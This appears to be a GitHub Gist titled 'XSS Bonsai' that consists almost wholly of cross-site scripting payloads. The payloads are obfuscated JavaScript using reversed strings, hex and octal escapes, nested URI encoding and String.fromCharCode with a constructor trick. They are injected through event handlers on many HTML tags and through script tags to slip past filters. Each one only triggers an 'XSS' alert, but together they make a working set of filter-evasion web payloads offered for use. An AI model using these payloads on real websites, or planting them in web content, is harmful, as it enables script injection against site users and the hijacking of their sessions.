-
-
Save nash716/deac5d841aa22d9c31b8 to your computer and use it in GitHub Desktop.
XSS Bonsai
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
";eval(';)\'SSX\'(trela'.split('').reverse().join(''))// | |
\";top['\x61\x6C\x65\x72\x74']('\x58\x53\x53')// | |
'+parent['aleraaaaat'.replace('aaaaa','')]('XaaaaaSaaaaaS'.replace('aaaaa','').replace('aaaaa',''))+' | |
"+parent['\141lert']('\130SS')+"",500000000000000000000,50000000000000000000001)}parent['ahogehogehogehogehogehogehogheogehogheogheoghowghoewghowghweoghweoghe'.charAt()]();// | |
\u003cscript\u003ealert('XabababababababSabababababababS'.\u0072eplace('ababababababab','').\u0072eplace('ababababababab',''));\u003c\u002fscript\u003easdasdsadasda | |
\\x3csc\u0072ipt\u003e\u0020alert('XababababababSababababababS'.\u0072ep\u006cace('abababababab','').\u0072ep\u006cace('abababababab',''));//\\x3c\u002fsc\u0072ipt\u003easfasasfddsadasdaasdasdad | |
<input/onchange="alert('XSS')"> | |
<div/onclick="setInterval('alert(\'XSS\')',1654);">asdasdasdasfgagdsfdas</div> | |
<span/oncontextmenu="setInterval('\u0009ale'+('\u0020rt(\'\u0058\u0053S\')').substring(100000000000-99999999999),1655)">weiweiweiwei</span> | |
<pre/ondblclick="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%252525252525252525252525252561%25252525252525252525252525256c%252525252525252525252525252565%252525252525252525252525252572%252525252525252525252525252574%252525252525252525252525252528%252525252525252525252525252527%252525252525252525252525252558%252525252525252525252525252553%252525252525252525252525252553%252525252525252525252525252527%252525252525252525252525252529')))))))))))))))),1653-1653);">asdasdcxzsxasdasfghytfgreddsfgdsgagdsfdas</pre> | |
<ul/ondragstart="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%2525252525252525252525252561%252525252525252525252525256c%2525252525252525252525252565%2525252525252525252525252572%2525252525252525252525252574%2525252525252525252525252528%2525252525252525252525252527%2525252525252525252525252558%2525252525252525252525252553%2525252525252525252525252553%2525252525252525252525252527%2525252525252525252525252529')))))))))))))))),1652-1652);">asdasdcxzsxasdasfghytfgredlkjhngtfrddsfgdsgagdsfdas</ul> | |
<li/ondragend="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%25252525252525252525252561%2525252525252525252525256c%25252525252525252525252565%25252525252525252525252572%25252525252525252525252574%25252525252525252525252528%25252525252525252525252527%25252525252525252525252558%25252525252525252525252553%25252525252525252525252553%25252525252525252525252527%25252525252525252525252529')))))))))))))))),1651-1651);">asdasdcxzsxasdasfghytfgredlkhgkujhrtfgjhgrtfttsfgdsgagdsfdas</li> | |
<ol/oncopy="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%252525252525252525252561%25252525252525252525256c%252525252525252525252565%252525252525252525252572%252525252525252525252574%252525252525252525252528%252525252525252525252527%252525252525252525252558%252525252525252525252553%252525252525252525252553%252525252525252525252527%252525252525252525252529')))))))))))))))),1650-1650);">asdasdcxkjhjklkjhzsxasdasfghytfgredlkhgkujhrtfgjhgrtfttsfgdsgagdsfdas</ol> | |
<dl/onbeforecopy="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%2525252525252525252561%252525252525252525256c%2525252525252525252565%2525252525252525252572%2525252525252525252574%2525252525252525252528%2525252525252525252527%2525252525252525252558%2525252525252525252553%2525252525252525252553%2525252525252525252527%2525252525252525252529')))))))))))))))),1649-1649);">vrhnfediufthkmrdlf</dl> | |
<dt/onselectstart="setTimeout(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent(decodeURIComponent('%25252525252525252561%2525252525252525256c%25252525252525252565%25252525252525252572%25252525252525252574%25252525252525252528%25252525252525252527%25252525252525252558%25252525252525252553%25252525252525252553%25252525252525252527%25252525252525252529')))))))))))))))),1648-1648);">vrhnfedjhgfhjiufthkmrdlf</dt> | |
<dd/ondragenter="setInterval(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI('%252525252525252561%25252525252525256c%252525252525252565%252525252525252572%252525252525252574%252525252525252528%252525252525252527%252525252525252558%252525252525252553%252525252525252553%252525252525252527%252525252525252529')))))))))))))))),1453);">asdasdcxzsxasdasfghytfgreddsffvdcfvgbvgdsgagdsfdas</dd> | |
<table/ondragleave="setInterval(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI('%2525252525252561%252525252525256c%2525252525252565%2525252525252572%2525252525252574%2525252525252528%2525252525252527%2525252525252558%2525252525252553%2525252525252553%2525252525252527%2525252525252529')))))))))))))))),1452);">asdasdcsregbdtnftrgbdbvexzsxasdasfghytfgreddsfgdsgagdsfdas</table> | |
<strike/ondrag="setInterval(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI(decodeURI('%25252525252561%2525252525256c%25252525252565%25252525252572%25252525252574%25252525252528%25252525252527%25252525252558%25252525252553%25252525252553%25252525252527%25252525252529')))))))))))))))),1451);">asdasdcxzsxsrbgdtfgrfvfecrvtgbfasdasfghytfgreddsfgdsgagdsfdas</strike> | |
<img/src="asdsgjiosforguhresokieleskd"/onerror="_=String.fromCharCode(0x0000000063,0x000000006f,0x000000006e,0x0000000073,0x0000000074,0x0000000072,0x0000000075,0x0000000063,0x0000000074,0x000000006f,0x0000000072),__=String.fromCharCode(0x0000000061,0x00000000006c,0x000000000065,0x000000000072,0x000000000074),___=String.fromCharCode(0x0000000058,0x000000000053,0x000000000053),{}[_][_](__+'(\''+___+'\')')()"> | |
<isindex/onpaste="_=String.fromCharCode(0x0000063,0x000006f,0x000006e,0x0000073,0x0000074,0x0000072,0x0000075,0x0000063,0x0000074,0x000006f,0x0000072),__=String.fromCharCode(0x0000061,0x000006c,0x0000065,0x0000072,0x0000074),___=String.fromCharCode(0x0000058,0x000000053,0x000000053),{}[_][_](__+'(\''+___+'\')')()"> | |
<h1/onmouseover="alert('XSS')">sfsdfdsfdfdsfdsfdfdsfdsfdsfdafassdsasfdsfhrtf</h1> | |
<h2/onmouseenter="alert('XSS')">gingfleaivjmdsojmlfdijsmfldv</h2> | |
<h3/onmouseleave="alert('XSS')">gingfleaivjmaregddsojmlfdijsmfldv</h3> | |
<h4/onmouseout="alert('XSS')">gingfleaivjfdsfsdfgfedfmaregddsojmlfdijsmfldv</h4> | |
<h5/onmousedown="window[String.fromCharCode(501-404,501-393,501-400,501-387,501-385)](String.fromCharCode(10088-10000,10083-10000,10083-10000))">gingfleaivjfdsffgfdgghfdfsgfdsdfgfedfmaregddsojmlfdijsmfldv</h5> | |
<h6/onmouseup="alert('XSS')">gingfleaivjfdsffgfdgghfdfsgfdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</h6> | |
<button/onfocusout="alert('XSS')">gingflfdghfgfdsfgfdsdeaivjfdsffgfdgghfdfsgsdadsfdsafdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</button> | |
<select/onfocusin="alert('XSS')">gingflfdfghfdghjkhgfdghjkghfgfdsfgfdsdeaivjfdsffgfdgghfdfsgsdadsfdsafdsdfgfedfmaregddsojfsaadffdsadfsalfdijsmfldv</select> | |
<script>alert('XSS');</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment